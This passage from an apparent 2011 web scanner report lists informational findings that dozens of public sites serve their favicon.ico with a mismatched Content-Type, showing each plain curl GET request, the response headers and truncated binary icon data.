User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.ad4game.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:44:38 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Wed, 24 Sep 2008 00:20:02 GMT
ETag: "a5d731-47e-457993ecbd080"
Accept-Ranges: bytes
Content-Length: 1150
Connection: close
Content-Type: text/plain; charset=UTF-8

............ .h.......(....... ..... ............................................................................................&...>...>...>...>...8...........................................<c...c.
...[SNIP]...

27.8. http://www.alibaba.com/favicon.ico

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.alibaba.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.alibaba.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:31:24 GMT
Server: Apache/2.2.15 (Unix) mod_AliCookie(for apache2.x)/1.1 Beacon/3.2 mod_jk/1.2.28
Set-Cookie: ali_apache_id=173.193.214.243.64460051084706.7; path=/; domain=.alibaba.com; expires=Wed, 30-Nov-2084 01:01:01 GMT
Set-Cookie: ali_apache_sid=173.193.214.243.64460051084706.7|1301752884; path=/; domain=.alibaba.com
Last-Modified: Wed, 29 Dec 2010 15:54:08 GMT
ETag: "dc008-57e-4988e9451a800"
Accept-Ranges: bytes
Content-Length: 1406
Vary: Accept-Encoding,User-Agent
Content-Type: text/plain

..............h.......(....... ...........@............................p...LL......t.......(H.0P......,Hx. XX.....4h.. 0@.0`...|...,,.........8x......0@X..00.. 0..............\\......|.......<D.<\..D`
...[SNIP]...

27.9. http://www.alibris.com/favicon.ico

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.alibris.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain; charset=UTF-8

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.alibris.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:56:33 GMT
Server: Apache
Last-Modified: Mon, 28 Feb 2011 22:30:09 GMT
Accept-Ranges: bytes
Content-Length: 318
Connection: close
Content-Type: text/plain; charset=UTF-8

..............(.......(....... .................................................1...A..#`..3...F...J...R...R...Z...Z...c...c............................0H.....p.Pzo..0..`o......./...0...    ...`_.......
...[SNIP]...

27.10. http://www.allbusiness.com/favicon.ico

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.allbusiness.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain; charset=UTF-8

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.allbusiness.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:37:40 GMT
Server: Apache
Last-Modified: Thu, 18 Feb 2010 01:02:45 GMT
ETag: "47e"
Accept-Ranges: bytes
Content-Length: 1150
Content-Type: text/plain; charset=UTF-8

............ .h.......(....... ..... .............................................0@@.........?UU.$00.0@@.-<<.(66..$$......        .....:fw.2LR..........4M..........Ln...-.9KH.:QP.2DC..)(.....qrr.Sf].K...GX
...[SNIP]...

27.11. http://www.allvoices.com/favicon.ico

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.allvoices.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=UTF-8

The response states that it contains HTML. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.allvoices.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:32:31 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Thu, 31 Mar 2011 17:01:20 GMT
ETag: "5c04af-37e-49fca3e0b9800"
Accept-Ranges: bytes
Content-Length: 894
Content-Type: text/html; charset=UTF-8

..............h.......(....... .....................................................................................................>?.............................................u..g.................
...[SNIP]...

27.12. http://www.alphadictionary.com/favicon.ico

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.alphadictionary.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain; charset=ISO-8859-1

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.alphadictionary.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:55:33 GMT
Server: Apache/2.0.46 (Red Hat)
Last-Modified: Fri, 21 Oct 2005 16:19:00 GMT
ETag: "5a42d4-104a6-7f82500"
Accept-Ranges: bytes
Content-Length: 66726
Content-Type: text/plain; charset=ISO-8859-1

..............(....................... ..............00......h...............h...&.................. ..........V...00...........!..........h+...0..........H/...\.. .......4..V...00.......D......(.
...[SNIP]...

27.13. http://www.americantowns.com/favicon.ico

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.americantowns.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain; charset=UTF-8

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.americantowns.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Set-Cookie: ARPT=ZONVIRS192.168.6.52CKMQY; path=/
Date: Sat, 02 Apr 2011 13:39:53 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Fri, 17 Dec 2010 19:33:56 GMT
ETag: "550604-436-497a0404a1100"
Accept-Ranges: bytes
Content-Length: 1078
Content-Type: text/plain; charset=UTF-8

...... ..........&...........(.......(... ...@.......................................Hj..[.V.....C...643.5=..Y_\..{s.Tc..........DGW.....?B...3m............3.3.............3..""".....".""(=.3""".....
...[SNIP]...

27.14. http://www.andiesisle.com/favicon.ico

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.andiesisle.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.andiesisle.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:50:10 GMT
Server: Apache/1.3.42 (Unix) PHP/5.2.16 mod_log_bytes/1.2 mod_bwlimited/1.4 mod_auth_passthrough/1.8 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.7a
Last-Modified: Wed, 16 Feb 2005 07:38:30 GMT
ETag: "7a186e-47e-4212f876"
Accept-Ranges: bytes
Content-Length: 1150
Content-Type: text/plain

............ .h.......(....... ..... .........................................................................................%`@.,gJ..53...
..............................#6..[..0^...%D.........7rP.0.
...[SNIP]...

27.15. http://www.andkon.com/favicon.ico

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.andkon.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.andkon.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:49:01 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Fri, 18 Jun 2010 20:48:22 GMT
ETag: "3ed8bd8-57e-135d9180"
Accept-Ranges: bytes
Content-Length: 1406
Content-Type: text/plain

..............h.......(....... ........................................t......................................###.............................................[...7...    .......f.......S...h.......    .
...[SNIP]...

27.16. http://www.apartmenthomeliving.com/favicon.ico

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.apartmenthomeliving.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain; charset=UTF-8

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.apartmenthomeliving.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 14:18:33 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Thu, 28 Oct 2010 13:52:12 GMT
Accept-Ranges: bytes
Content-Length: 1150
Connection: close
Content-Type: text/plain; charset=UTF-8

............ .h.......(....... ..... ...............................z...z..X...g...q..}v..t{(.....f.@.f.@.f.@.f.@.f.@.f.@.f.@...........z..X...k...}....&...8.......|...z...z...z...z...z.f.@...........
...[SNIP]...

27.17. http://www.apartmentratings.com/favicon.ico

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.apartmentratings.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain; charset=UTF-8

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.apartmentratings.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:53:40 GMT
Server: Apache
Last-Modified: Wed, 18 Aug 2010 21:44:46 GMT
ETag: "1cf3b8-57e-48e1ff9632f80"
Accept-Ranges: bytes
Content-Length: 1406
Cache-Control: max-age=600
Expires: Sat, 02 Apr 2011 14:03:40 GMT
Vary: Accept-Encoding
X-Cnection: close
Content-Type: text/plain; charset=UTF-8
Set-Cookie: BIGipServerapt-www_POOL=1189351596.0.0000; path=/

..............h.......(....... ...........@.................................I.J....l..q._.&.....|...;.^.|...'.8........x&...Q..x....U.h.n.....U...0...
.....G..}1.C.....'.{.S..p...u..=........T.....O.
...[SNIP]...

27.18. http://www.arizona.edu/favicon.ico

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.arizona.edu
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=iso-8859-1

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.arizona.edu
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.14 (EL)
Content-Type: text/html; charset=iso-8859-1
cache-control: max-age=2419200
Content-Length: 45
Date: Sat, 02 Apr 2011 13:34:06 GMT
X-Varnish: 864489494 846145933
Via: 1.1 varnish
Connection: keep-alive
age: 0
clusternode: brandi

The requested file favicon.ico was not found.

27.19. http://www.aroundme.com/favicon.ico

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.aroundme.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain; charset=UTF-8

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.aroundme.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Tue, 16 Nov 2010 18:45:24 GMT
ETag: "80032d-47e-4952ff5a3d900"
Accept-Ranges: bytes
Content-Length: 1150
Content-Type: text/plain; charset=UTF-8
Cache-Control: max-age=79251
Expires: Sun, 03 Apr 2011 12:14:12 GMT
Date: Sat, 02 Apr 2011 14:13:21 GMT
Connection: close

............ .h.......(....... ..... .....................................................................I..........)...............................................)d...?..........(................f.
...[SNIP]...

27.20. http://www.articlesbase.com/favicon.ico

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.articlesbase.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain; charset=UTF-8

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.articlesbase.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:26:47 GMT
Server: Apache/2
Last-Modified: Thu, 31 Mar 2011 15:35:17 GMT
ETag: "47e-49fc90a4e7740"
Accept-Ranges: bytes
Content-Length: 1150
Cache-Control: max-age=3600
Expires: Sat, 02 Apr 2011 14:26:47 GMT
Connection: close
Content-Type: text/plain; charset=UTF-8

............ .h.......(....... ..... ...................................................................................................................................................................
...[SNIP]...

27.21. http://www.ask.com/favicon.ico

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.ask.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.ask.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: Apache
Content-Type: text/plain
Content-Length: 1150
ETag: "5515a3-47e-49e8a3349e980"
Last-Modified: Tue, 15 Mar 2011 19:11:50 GMT
Accept-Ranges: bytes
Date: Sat, 02 Apr 2011 12:37:17 GMT
Connection: close

............ .h.......(....... ..... ...................................................................................................................................................................
...[SNIP]...

27.22. http://www.astrology.com/favicon.ico

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.astrology.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain; charset=UTF-8

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.astrology.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: Apache
Content-Type: text/plain; charset=UTF-8
Accept-Ranges: bytes
Last-Modified: Wed, 30 Mar 2011 21:10:14 GMT
Content-Length: 1150
Cache-Control: max-age=2056
Expires: Sat, 02 Apr 2011 14:20:01 GMT
Date: Sat, 02 Apr 2011 13:45:45 GMT
Connection: close

............ .h.......(....... ..... ..........................I..h...h...h....K..........................i...h...h...h....P......h...h...h...j...........................h...h...h...h...........h...h.
...[SNIP]...

27.23. http://www.autozone.com/favicon.ico

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.autozone.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain; charset=UTF-8

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.autozone.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:41:04 GMT
Server: Apache
Last-Modified: Wed, 04 Mar 2009 22:09:57 GMT
Accept-Ranges: bytes
Content-Length: 3262
Vary: Accept-Encoding
Content-Type: text/plain; charset=UTF-8
Set-Cookie: NSC_bvupapof.dpn=e795366b3660;Version=1;path=/

...... ..............(... ...@.........................................................................................................................................................................
...[SNIP]...

27.24. http://www.avast.com/favicon.ico

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.avast.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.avast.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Content-Type: text/html
Accept-Ranges: bytes
ETag: "544016114"
Last-Modified: Wed, 05 May 2010 08:20:54 GMT
Content-Length: 2550
Date: Sat, 02 Apr 2011 13:38:01 GMT
Server: httpd

..............h...&......... .h.......(....... ............................................ ...(...*....... ..."...$...+..."...%...&...(...)...-...>...C..8O..;W..=X..\o...0...;...?...>..    F...H...[...S
...[SNIP]...

27.25. http://www.babelgum.com/favicon.ico

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.babelgum.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain; charset=UTF-8

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.babelgum.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Accept-Ranges: bytes
Content-Type: text/plain; charset=UTF-8
ETag: "d6d83f-47e-4942acc6bd980"
Server: Apache/2.2.16
Age: 43455
Date: Sat, 02 Apr 2011 13:41:18 GMT
Last-Modified: Wed, 03 Nov 2010 19:10:46 GMT
Content-Length: 1150
Connection: keep-alive

............ .h.......(....... ..... ................................................F....h...j..........F...................................B].....o...u..............v.U......D......................
...[SNIP]...

27.26. http://www.bankofamerica.com/favicon.ico

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.bankofamerica.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-type: text/plain

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.bankofamerica.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Sat, 02 Apr 2011 12:42:47 GMT
Content-length: 1406
Content-type: text/plain
Last-modified: Thu, 01 Aug 2002 16:37:18 GMT
Etag: "57e-3d4963be"
Accept-ranges: bytes
Set-Cookie: BIGipServerngen-www.80=3108419243.20480.0000; path=/

..............h.......(....... ...........@...............................................................................................................k...H...%............z...b...Js..2P...........
...[SNIP]...

27.27. http://www.beezid.com/favicon.ico

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.beezid.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain; charset=UTF-8

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.beezid.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Last-Modified: Tue, 27 Oct 2009 18:54:28 GMT
ETag: "b0857e-37e-476ef35294100"
Content-Type: text/plain; charset=UTF-8
Content-Length: 894
Server: Apache
Date: Sat, 02 Apr 2011 14:02:47 GMT
Connection: keep-alive

..............h.......(....... ..................................j.]j.]j.]j.]j.]j.]j.]j.]j.]j.]j.]j.]j.]j.]...j.]>p7.K..J..J..J..J..J..P.1c$/b"/b"1c$.O.>q7j.]j.]........................%c.1i!5l'.T.n.a
...[SNIP]...

27.28. http://www.blucigs.com/favicon.ico

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.blucigs.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.blucigs.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:56:52 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Wed, 17 Nov 2010 18:34:18 GMT
ETag: "47e-49543ebc8de80"
Accept-Ranges: bytes
Content-Length: 1150
Cache-Control: max-age=31536000
Expires: Sun, 01 Apr 2012 13:56:52 GMT
Vary: Accept-Encoding,User-Agent
BCWEB-Cluster: BLUWEB02
Content-Type: text/plain

............ .h.......(....... ..... ................................................J....-C..:X.........<..................................."....A`..*>..Wx..Hi..%,..\{.....e..........................
...[SNIP]...

27.29. http://www.blurtit.com/favicon.ico

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.blurtit.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain; charset=UTF-8

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.blurtit.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:26:11 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Wed, 30 Sep 2009 09:46:35 GMT
ETag: "168f3f-57e-474c8680ff4c0"
Accept-Ranges: bytes
Content-Length: 1406
Vary: Accept-Encoding,User-Agent
Content-Type: text/plain; charset=UTF-8

..............h.......(....... .................................'...'...)...,...-......./...0...1...2...3...4...4...5...6...7...=...D...E...E...J...K...Q...T...U...X...Z...]...a...c...d...d...h...p...
...[SNIP]...

27.30. http://www.boingboing.net/favicon.ico

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.boingboing.net
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain; charset=UTF-8

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.boingboing.net
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:51:46 GMT
Server: Apache/2.2
Last-Modified: Sat, 10 Nov 2001 21:51:13 GMT
Accept-Ranges: bytes
Content-Length: 894
Content-Type: text/plain; charset=UTF-8

..............h.......(....... .........................................................................................................................................................................
...[SNIP]...

27.31. http://www.bravotv.com/favicon.ico

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.bravotv.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain; charset=UTF-8

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.bravotv.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (Red Hat)
X-Varnish: 2154978050
Content-Type: text/plain; charset=UTF-8
static: true
Varnish-X-Cache: MISS
ETag: "1f70018-e36-48d66ec91c780"
Last-Modified: Mon, 09 Aug 2010 16:58:22 GMT
Content-Length: 3638
Cache-Control: max-age=246
Date: Sat, 02 Apr 2011 13:40:11 GMT
Connection: close

..............h...&... ..............(....... ...........@.............................1.BAE.....sg+...5.! ".PI(...3.../.f\)..z-...4...2.~p,... .A@B.!.%.......". .!. .$.A@D.BAC..... .#.! $.....OH(...
...[SNIP]...

27.32. http://www.breitbart.com/favicon.ico

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.breitbart.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain; charset=UTF-8

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.breitbart.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Sat, 02 Apr 2011 13:44:48 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Sat, 24 Jan 2009 22:53:57 GMT
Accept-Ranges: bytes
Content-Length: 894
X-Server-Processing-Time: D=191 microseconds
Content-Type: text/plain; charset=UTF-8
Age: 4
X-Cache: HIT from ch-sv-bb2.ha-hosting.com
Connection: keep-alive

..............h.......(....... ....................................................]..\..~..................................#...v..r..r..v. ..y.......................;...v.    x.>..n..o..@..
y..u.7.....
...[SNIP]...

27.33. http://www.buzzillions.com/favicon.ico

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.buzzillions.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain; charset=UTF-8

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.buzzillions.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 14:03:29 GMT
Server: Apache/2.2.9 (Unix)
Last-Modified: Wed, 22 Sep 2010 23:48:40 GMT
ETag: "13e"
Accept-Ranges: bytes
Content-Length: 318
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain; charset=UTF-8

..............(.......(....... .......................................#...X...\...................+...r..............................@7wwwwwws.w9ww.wx.w=7s.wq.w....wq.wu..Wwq.w{...wq.w....wq.......q.;
...[SNIP]...

27.34. http://www.cabelas.com/favicon.ico

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.cabelas.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain; charset=UTF-8

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.cabelas.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Thu, 13 May 2010 15:41:30 GMT
Accept-Ranges: bytes
Content-Length: 1406
Content-Type: text/plain; charset=UTF-8
Cache-Control: max-age=604800
Date: Sat, 02 Apr 2011 13:32:03 GMT
Connection: close

..............h.......(....... ...............................


."n...N..&....Zn.&Z..2...F...JVF.....FZ".VrJ.:N..."*.:...Fb*.F...Bvj.Vf6.&.......>...>Z..*J.."...f...6R
.J...VjB.6:*.RrZ.B....."..~..6.
...[SNIP]...

27.35. http://www.caringbridge.org/favicon.ico

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.caringbridge.org
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain; charset=UTF-8

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.caringbridge.org
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:44:05 GMT
Server: Apache
Last-Modified: Tue, 06 Jul 2010 23:34:06 GMT
ETag: "329395-37e-48ac07d37b780"
Accept-Ranges: bytes
Content-Length: 894
Cache-Control: max-age=0
Expires: Sat, 02 Apr 2011 13:44:05 GMT
Content-Type: text/plain; charset=UTF-8

..............h.......(....... ......................................................................................im.7<.EK.=D.:?.......27.?E.=C.=B.............dh.QV...................NS..........=C
...[SNIP]...

27.36. http://www.cbc.ca/favicon.ico

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.cbc.ca
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.cbc.ca
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Thu, 16 Dec 2010 17:13:52 GMT
ETag: "39588a60-37e-2d87d400"
X-Origin-Server: web12:sb10
Content-Type: text/plain
Cache-Control: public, max-age=27700704
Expires: Fri, 17 Feb 2012 04:38:26 GMT
Date: Sat, 02 Apr 2011 14:00:02 GMT
Content-Length: 894
Connection: close

..............h.......(....... .................................................0..0..0................................................................................0........1..1..1........0........
...[SNIP]...

27.37. http://www.celebrity-gossip.net/favicon.ico

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.celebrity-gossip.net
Path:   /favicon.ico

Issue detail

